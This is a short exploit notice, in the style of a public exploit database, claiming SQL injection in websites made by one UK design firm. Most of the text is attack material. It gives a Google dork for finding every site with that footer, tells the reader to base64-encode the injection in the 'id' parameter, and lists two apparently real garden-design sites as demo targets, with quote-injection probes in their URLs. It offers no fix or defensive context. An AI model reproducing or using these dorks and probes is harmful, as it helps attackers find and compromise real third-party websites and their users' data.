# Exploit Title :  Website design by duckfeet.co.uk SQL Injection Vulnerability
# Date : 2018-06-14
# Exploit Author : Iran Cyber Security Group
# Vendor Homepage : www.duckfeet.co.uk
# Google Dork : "Website design by duckfeet.co.uk" 
# category : webapps
# Tested on : Win7 , Kali Linux

Proof of Concept : 

 search google Dork : "Website design by duckfeet.co.uk" 


 **url encoded base64..convert sql injection command to base64**

 Demo :
 
  http://www.deanhousegardens.co.uk/page.php?id=Mic= [Sql injection Vulnerability]
  http://arbutusgardendesign.co.uk/galleryDetails.php?id=MTEn [Sql injection Vulnerability]
 
# Discovered by : Mr_null